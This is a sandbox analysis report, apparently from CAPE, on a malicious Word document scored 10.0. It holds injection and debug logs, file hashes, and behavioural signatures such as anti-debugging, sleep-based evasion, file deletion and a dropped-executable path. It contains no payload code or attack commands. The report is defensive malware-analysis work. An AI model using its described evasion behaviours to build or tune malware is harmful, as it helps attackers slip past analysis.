2019-10-10 01:12:22,532 [root] DEBUG: DLL loaded at 0x0000000516F00000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\diasymreader (0xc6000 bytes).
2019-10-10 01:12:23,936 [modules.auxiliary.human] INFO: Closing Office window.
2019-10-10 01:12:24,061 [root] DEBUG: DLL unloaded from 0x6AEA0000.
2019-10-10 01:12:24,092 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-10-10 01:12:24,122 [root] DEBUG: DLL unloaded from 0x6AEA0000.
2019-10-10 01:12:29,006 [root] DEBUG: DLL unloaded from 0x6FFD0000.
2019-10-10 01:12:29,568 [root] DEBUG: DLL unloaded from 0x76C00000.
2019-10-10 01:12:29,630 [root] DEBUG: DLL unloaded from 0x6AE20000.
2019-10-10 01:12:29,707 [root] DEBUG: DLL unloaded from 0x75980000.
2019-10-10 01:12:29,786 [root] DEBUG: DLL unloaded from 0x6AEA0000.
2019-10-10 01:12:30,003 [root] DEBUG: DLL unloaded from 0x65300000.
2019-10-10 01:12:31,345 [root] DEBUG: DLL loaded at 0x6B100000: C:\Windows\system32\POWRPROF (0x25000 bytes).
2019-10-10 01:12:31,454 [root] DEBUG: DLL unloaded from 0x6B100000.
2019-10-10 01:12:32,000 [root] DEBUG: DLL unloaded from 0x75980000.
2019-10-10 01:12:32,078 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-10-10 01:12:32,203 [root] DEBUG: DLL unloaded from 0x6A620000.
2019-10-10 01:12:32,250 [root] DEBUG: DLL unloaded from 0x6B7E0000.
2019-10-10 01:12:32,344 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 01:12:32,421 [root] DEBUG: DLL unloaded from 0x6B760000.
2019-10-10 01:12:32,532 [root] DEBUG: DLL unloaded from 0x73BA0000.
2019-10-10 01:12:32,703 [root] DEBUG: DLL unloaded from 0x2F9A0000.
2019-10-10 01:12:32,890 [root] DEBUG: DLL unloaded from 0x6B720000.
2019-10-10 01:12:33,030 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 01:12:33,312 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-10-10 01:12:33,358 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-10-10 01:12:33,358 [root] DEBUG: DLL unloaded from 0x747D0000.
2019-10-10 01:12:33,358 [root] DEBUG: DLL unloaded from 0x6FFD0000.
2019-10-10 01:12:33,358 [root] DEBUG: DLL unloaded from 0x6B6C0000.
2019-10-10 01:12:33,358 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 01:12:33,358 [root] DEBUG: DLL unloaded from 0x74930000.
2019-10-10 01:12:33,374 [root] DEBUG: DLL unloaded from 0x75700000.
2019-10-10 01:12:33,374 [root] DEBUG: DLL unloaded from 0x6B720000.
2019-10-10 01:12:33,390 [root] DEBUG: DLL unloaded from 0x000007FEF4FC0000.
2019-10-10 01:12:33,421 [root] WARNING: File at path "C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7C581AA1-5DA9-47A8-BE56-AED5669B1F15}.tmp" does not exist, skip.
2019-10-10 01:12:33,421 [root] DEBUG: DLL unloaded from 0x758B0000.
2019-10-10 01:12:33,421 [root] DEBUG: DLL unloaded from 0x6FFD0000.
2019-10-10 01:12:33,436 [root] DEBUG: DLL unloaded from 0x754F0000.
2019-10-10 01:12:33,436 [root] DEBUG: DLL unloaded from 0x6AE60000.
2019-10-10 01:12:33,436 [root] DEBUG: DLL unloaded from 0x6B5C0000.
2019-10-10 01:12:33,499 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 01:12:33,499 [root] DEBUG: DLL unloaded from 0x75140000.
2019-10-10 01:12:33,499 [root] DEBUG: DLL unloaded from 0x000007FEF2E10000.
2019-10-10 01:12:33,499 [root] DEBUG: DLL unloaded from 0x749D0000.
2019-10-10 01:12:33,513 [root] INFO: Notified of termination of process with pid 1224.
2019-10-10 01:12:34,184 [root] INFO: Process with pid 1224 has terminated
2019-10-10 01:12:35,214 [root] INFO: Process with pid 3012 has terminated
2019-10-10 01:12:51,720 [root] DEBUG: DLL unloaded from 0x000007FEFB0D0000.
2019-10-10 01:12:52,125 [root] INFO: Announced 64-bit process name: WmiPrvSE.exe pid: 2932
2019-10-10 01:12:52,125 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:12:52,155 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:12:52,155 [root] DEBUG: Loader: Injecting process 2932 (thread 2380) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:12:52,155 [root] DEBUG: Process image base: 0x00000000FF6E0000
2019-10-10 01:12:52,171 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:12:52,171 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF73F000 - 0x000007FEFF430000
2019-10-10 01:12:52,171 [root] DEBUG: InjectDllViaIAT: Allocated 0x234 bytes for new import table at 0x00000000FF740000.
2019-10-10 01:12:52,187 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:12:52,187 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:12:52,187 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2932
2019-10-10 01:12:52,203 [root] INFO: Announced 64-bit process name: WmiPrvSE.exe pid: 2932
2019-10-10 01:12:52,203 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:12:52,219 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:12:52,219 [root] DEBUG: Loader: Injecting process 2932 (thread 2380) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:12:52,233 [root] DEBUG: Process image base: 0x00000000FF6E0000
2019-10-10 01:12:52,233 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:12:52,233 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:12:52,233 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:12:52,250 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2932
2019-10-10 01:12:52,250 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:12:52,280 [root] INFO: Disabling sleep skipping.
2019-10-10 01:12:52,296 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:12:52,296 [root] WARNING: Unable to hook LockResource
2019-10-10 01:12:52,312 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:12:52,312 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2932 at 0x000000006B360000, image base 0x00000000FF6E0000, stack from 0x0000000000290000-0x00000000002A0000
2019-10-10 01:12:52,312 [root] DEBUG: Commandline: C:\Windows\sysnative\wbem\wmiprvse.exe -Embedding.
2019-10-10 01:12:52,328 [root] INFO: Added new process to list with pid: 2932
2019-10-10 01:12:52,328 [root] INFO: Monitor successfully loaded in process with pid 2932.
2019-10-10 01:12:52,344 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-10-10 01:12:52,358 [root] DEBUG: DLL loaded at 0x000007FEFC190000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-10-10 01:12:52,358 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-10-10 01:12:52,437 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-10-10 01:12:52,453 [root] DEBUG: DLL loaded at 0x000007FEF9D50000: C:\Windows\system32\wbem\wbemprox (0xf000 bytes).
2019-10-10 01:12:52,467 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-10-10 01:12:52,483 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-10-10 01:12:52,500 [root] DEBUG: DLL loaded at 0x000007FEFD000000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2019-10-10 01:12:52,546 [root] DEBUG: DLL loaded at 0x000007FEFA0A0000: C:\Windows\system32\wbem\wbemsvc (0x14000 bytes).
2019-10-10 01:12:52,562 [root] DEBUG: DLL loaded at 0x000007FEF97C0000: C:\Windows\system32\wbem\wmiutils (0x26000 bytes).
2019-10-10 01:12:52,951 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-10-10 01:12:53,513 [root] DEBUG: DLL loaded at 0x000007FEF9860000: C:\Windows\system32\wbem\wmiprov (0x3c000 bytes).
2019-10-10 01:13:14,184 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2019-10-10 01:13:14,371 [root] WARNING: File at path "C:\Users\user\852.exe" does not exist, skip.
2019-10-10 01:13:24,089 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-10-10 01:13:25,430 [root] DEBUG: DLL unloaded from 0x000007FEF2A00000.
2019-10-10 01:13:25,650 [root] DEBUG: DLL unloaded from 0x000007FEF97C0000.
2019-10-10 01:13:25,664 [root] DEBUG: DLL unloaded from 0x000007FEF9A00000.
2019-10-10 01:13:25,664 [root] DEBUG: DLL unloaded from 0x000007FEFA0A0000.
2019-10-10 01:13:25,680 [root] DEBUG: DLL unloaded from 0x000007FEF9D50000.
2019-10-10 01:13:25,836 [root] DEBUG: DLL unloaded from 0x000007FEFC190000.
2019-10-10 01:13:25,852 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-10-10 01:13:25,884 [root] INFO: Notified of termination of process with pid 2760.
2019-10-10 01:13:26,101 [root] WARNING: File at path "C:\Users\user\852.exe" does not exist, skip.
2019-10-10 01:13:26,132 [root] WARNING: File at path "C:\Users\user\852.exe" does not exist, skip.
2019-10-10 01:13:26,132 [root] WARNING: File at path "C:\Users\user\852.exe" does not exist, skip.
2019-10-10 01:13:26,148 [root] WARNING: File at path "C:\Users\user\852.exe" does not exist, skip.
2019-10-10 01:13:26,196 [root] DEBUG: DLL loaded at 0x000007FEFAC20000: C:\Windows\system32\netutils (0xc000 bytes).
2019-10-10 01:13:26,210 [root] DEBUG: DLL unloaded from 0x000007FEFB840000.
2019-10-10 01:13:26,226 [root] DEBUG: DLL unloaded from 0x000007FEFC500000.
2019-10-10 01:13:26,226 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-10-10 01:13:26,243 [root] DEBUG: DLL unloaded from 0x000007FEF2060000.
2019-10-10 01:13:26,257 [root] DEBUG: DLL unloaded from 0x000007FEF2D70000.
2019-10-10 01:13:26,257 [root] DEBUG: DLL unloaded from 0x000007FEFC190000.
2019-10-10 01:13:26,273 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-10-10 01:13:26,289 [root] INFO: Notified of termination of process with pid 2348.
2019-10-10 01:13:26,601 [root] INFO: Process with pid 2760 has terminated
2019-10-10 01:13:27,647 [root] INFO: Process with pid 2348 has terminated
2019-10-10 01:13:28,862 [root] DEBUG: DLL unloaded from 0x000007FEF9540000.
2019-10-10 01:13:36,164 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF8390000 to caller regions list (ntdll::NtDuplicateObject).
2019-10-10 01:13:36,210 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF45C0000 to caller regions list (ntdll::NtDuplicateObject).
2019-10-10 01:13:36,382 [root] INFO: Announced 64-bit process name: taskhost.exe pid: 2436
2019-10-10 01:13:36,414 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:13:36,631 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:13:36,631 [root] DEBUG: Loader: Injecting process 2436 (thread 0) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:13:36,648 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2988, handle 0x84
2019-10-10 01:13:36,648 [root] DEBUG: Process image base: 0x00000000FFC30000
2019-10-10 01:13:36,663 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-10-10 01:13:36,678 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-10-10 01:13:36,694 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:13:36,740 [root] INFO: Disabling sleep skipping.
2019-10-10 01:13:36,788 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:13:36,803 [root] WARNING: Unable to hook LockResource
2019-10-10 01:13:36,851 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2436 at 0x000000006B360000, image base 0x00000000FFC30000, stack from 0x0000000002B86000-0x0000000002B90000
2019-10-10 01:13:36,865 [root] DEBUG: Commandline: C:\Windows\sysnative\"taskhost.exe".
2019-10-10 01:13:36,865 [root] INFO: Added new process to list with pid: 2436
2019-10-10 01:13:36,897 [root] INFO: Monitor successfully loaded in process with pid 2436.
2019-10-10 01:13:36,913 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 01:13:36,928 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 01:13:36,928 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:13:36,990 [modules.auxiliary.human] INFO: Found button "OK", clicking it
2019-10-10 01:13:37,786 [root] ERROR: Traceback (most recent call last):
  File "C:\awvqohb\analyzer.py", line 831, in run
    handler.start()
  File "C:\Python27\lib\threading.py", line 745, in start
    _start_new_thread(self.__bootstrap, ())
error: can't start new thread
Traceback (most recent call last):
  File "C:\awvqohb\analyzer.py", line 831, in run
    handler.start()
  File "C:\Python27\lib\threading.py", line 745, in start
    _start_new_thread(self.__bootstrap, ())
error: can't start new thread
2019-10-10 01:13:38,286 [root] DEBUG: DLL unloaded from 0x0000000076EF0000.
2019-10-10 01:13:38,286 [root] DEBUG: DLL unloaded from 0x000007FEFB060000.
2019-10-10 01:13:38,316 [root] DEBUG: DLL unloaded from 0x000007FEFBB00000.
2019-10-10 01:13:38,378 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 01:14:02,621 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-10-10 01:14:43,898 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-10-10 01:14:43,898 [root] INFO: Created shutdown mutex.
2019-10-10 01:14:44,913 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 1632
2019-10-10 01:14:44,913 [root] INFO: Terminate event set for process 1632.
2019-10-10 01:14:44,913 [root] DEBUG: Terminate Event: Skipping dump of process 1632
2019-10-10 01:14:44,913 [root] INFO: Terminating process 1632 before shutdown.
2019-10-10 01:14:44,913 [root] INFO: Waiting for process 1632 to exit.
2019-10-10 01:14:44,913 [root] DEBUG: Terminate Event: Shutdown complete for process 1632 but failed to inform analyzer.
2019-10-10 01:14:45,927 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 2932
2019-10-10 01:14:45,927 [root] INFO: Terminate event set for process 2932.
2019-10-10 01:14:45,927 [root] INFO: Terminating process 2932 before shutdown.
2019-10-10 01:14:45,927 [root] INFO: Waiting for process 2932 to exit.
2019-10-10 01:14:45,927 [root] DEBUG: Terminate Event: Skipping dump of process 2932
2019-10-10 01:14:45,927 [root] DEBUG: Terminate Event: Shutdown complete for process 2932 but failed to inform analyzer.
2019-10-10 01:14:46,940 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 2436
2019-10-10 01:14:46,940 [root] INFO: Terminate event set for process 2436.
2019-10-10 01:14:46,940 [root] INFO: Terminating process 2436 before shutdown.
2019-10-10 01:14:46,940 [root] INFO: Waiting for process 2436 to exit.
2019-10-10 01:14:46,940 [root] DEBUG: Terminate Event: Skipping dump of process 2436
2019-10-10 01:14:46,940 [root] DEBUG: Terminate Event: Shutdown complete for process 2436 but failed to inform analyzer.
2019-10-10 01:14:47,954 [root] INFO: Shutting down package.
2019-10-10 01:14:47,954 [root] INFO: Stopping auxiliary modules.
2019-10-10 01:14:47,954 [root] INFO: Finishing auxiliary modules.
2019-10-10 01:14:47,954 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-10-10 01:14:47,954 [root] WARNING: File at path "C:\yfIMibnsZc\debugger" does not exist, skip.
2019-10-10 01:14:47,954 [root] WARNING: Monitor injection attempted but failed for process 80280815.
2019-10-10 01:14:47,954 [root] WARNING: Monitor injection attempted but failed for process 1.
2019-10-10 01:14:47,954 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2019-10-10 00:11:15 2019-10-10 00:15:02

File Details

File Name tmpjlr0l6ur
File Size 216576 bytes
File Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Re-contextualized, Subject: TCP, Author: Delmer Reichert, Keywords: Japan, Comments: Small Soft Towels, Template: Normal.dotm, Last Saved By: Arjun Flatley, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 21:38:00 2019, Last Saved Time/Date: Tue Oct 8 21:38:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 168, Security: 0
MD5 3c97fd74bbe556ed5e5d00b0176e79f8
SHA1 ccab819281040378fe6c825d0703fc5bac79f149
SHA256 6743e819a34e26290e4b9e7692ff5a063cdc0d48cc87f6c77fb3c28097db79e4
SHA512 366541400d6dbd7eb642d39ccb79ae1cba242d22bd249264172ced9b8d45f5ee0a81347216e37ad06bf0081b74ee82da7d48cc1418622b87f0afeffbc9e21e9e
CRC32 7725EB06
Ssdeep 6144:cGdugICAs3MXPxTqfVh6qYn4JH1O5DeWje6:cGdugIE3WxTqfbNNJH0FeWj
TrID
  • 54.2% (.DOC) Microsoft Word document (32000/1/3)
  • 32.2% (.DOC) Microsoft Word document (old ver.) (19000/1/2)
  • 13.5% (.) Generic OLE2 / Multistream Compound File (8000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Scheduled file move on reboot detected
File Move on Reboot: Old: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BBT2PZNY16H6UO4BLGV1.temp -> New: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Anomalous file deletion behavior detected (10+)
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Schemas\MS Word_restart.xml
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24BB29B5-31E2-492F-A1C2-B9A7CAF0970F}.tmp
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5A32F2.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6ECC0B75.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8474B044.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BF02AB8F.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E846D446.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49D91119.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36EA6778.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70128693.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3843BE5A.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7170127D.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\618D96C.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A37C1757.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\618D96C.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3843BE5A.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36EA6778.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E846D446.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8474B044.wmf
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5A32F2.wmf
DeletedFile: C:\Users\user\AppData\Local\Temp\CVR7204.tmp.cvr
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{758F78BC-E4A0-41F0-BD45-D36B0B402034}.tmp
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2348.6635733
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2348.6635733
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2348.6635733
Guard pages use detected - possible anti-debugging.
A process attempted to delay the analysis task.
Process: WINWORD.EXE tried to sleep 361 seconds, actually delayed analysis time by 0 seconds
Process: splwow64.exe tried to sleep 844 seconds, actually delayed analysis time by 0 seconds
Process: WmiPrvSE.exe tried to sleep 720 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/NotifyServiceStatusChangeW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: riched20.dll/REMSOHInst
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptSetHashParam
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: USP10.DLL/ScriptFreeCache
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: VBE7.DLL/DllVbeTerm
DynamicLoader: VBE7.DLL/DllCanUnloadNow
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: USER32.dll/UnregisterPowerSettingNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: DwmApi.DLL/DwmIsCompositionEnabled
DynamicLoader: DwmApi.DLL/DwmGetColorizationColor
DynamicLoader: kernel32.dll/GetProductInfo
DynamicLoader: kernel32.dll/GetUserGeoID
DynamicLoader: msi.dll/DllGetVersion
DynamicLoader: GdiPlus.dll/GdipDeleteCachedBitmap
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: Comctl32.dll/
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/SetDefaultPrinterW
DynamicLoader: WINSPOOL.DRV/GetDefaultPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverPackagePathW
DynamicLoader: WINSPOOL.DRV/CorePrinterDriverInstalledW
DynamicLoader: WINSPOOL.DRV/GetCorePrinterDriversW
DynamicLoader: WINSPOOL.DRV/UploadPrinterDriverPackageW
DynamicLoader: WINSPOOL.DRV/InstallPrinterDriverFromPackageW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/AddPrinterConnection2W
DynamicLoader: WINSPOOL.DRV/OpenPrinter2W
DynamicLoader: WINSPOOL.DRV/DeletePrinterKeyW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDataExW
DynamicLoader: WINSPOOL.DRV/EnumPrinterKeyW
DynamicLoader: WINSPOOL.DRV/EnumPrinterDataExW
DynamicLoader: WINSPOOL.DRV/GetPrinterDataExW
DynamicLoader: WINSPOOL.DRV/SetPrinterDataExW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDataW
DynamicLoader: WINSPOOL.DRV/EnumPrinterDataW
DynamicLoader: WINSPOOL.DRV/SpoolerPrinterEvent
DynamicLoader: WINSPOOL.DRV/SetPortW
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: WINSPOOL.DRV/DevicePropertySheets
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeW
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeA
DynamicLoader: WINSPOOL.DRV/AddPortExW
DynamicLoader: WINSPOOL.DRV/DeletePrintProvidorW
DynamicLoader: WINSPOOL.DRV/AddPrintProvidorW
DynamicLoader: WINSPOOL.DRV/DeletePrintProcessorW
DynamicLoader: WINSPOOL.DRV/DeleteMonitorW
DynamicLoader: WINSPOOL.DRV/AddMonitorW
DynamicLoader: WINSPOOL.DRV/StartDocDlgW
DynamicLoader: WINSPOOL.DRV/AdvancedDocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/AdvancedDocumentPropertiesA
DynamicLoader: WINSPOOL.DRV/DocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/DeviceCapabilitiesW
DynamicLoader: WINSPOOL.DRV/DeletePrinterIC
DynamicLoader: WINSPOOL.DRV/PlayGdiScriptOnPrinterIC
DynamicLoader: WINSPOOL.DRV/CreatePrinterIC
DynamicLoader: WINSPOOL.DRV/SetJobW
DynamicLoader: WINSPOOL.DRV/GetJobW
DynamicLoader: WINSPOOL.DRV/EnumJobsW
DynamicLoader: WINSPOOL.DRV/AddPrinterW
DynamicLoader: WINSPOOL.DRV/SetPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverDirectoryW
DynamicLoader: WINSPOOL.DRV/EnumPrintersW
DynamicLoader: WINSPOOL.DRV/AddPrinterConnectionW
DynamicLoader: WINSPOOL.DRV/DeletePrinterConnectionW
DynamicLoader: WINSPOOL.DRV/AddPrinterDriverExW
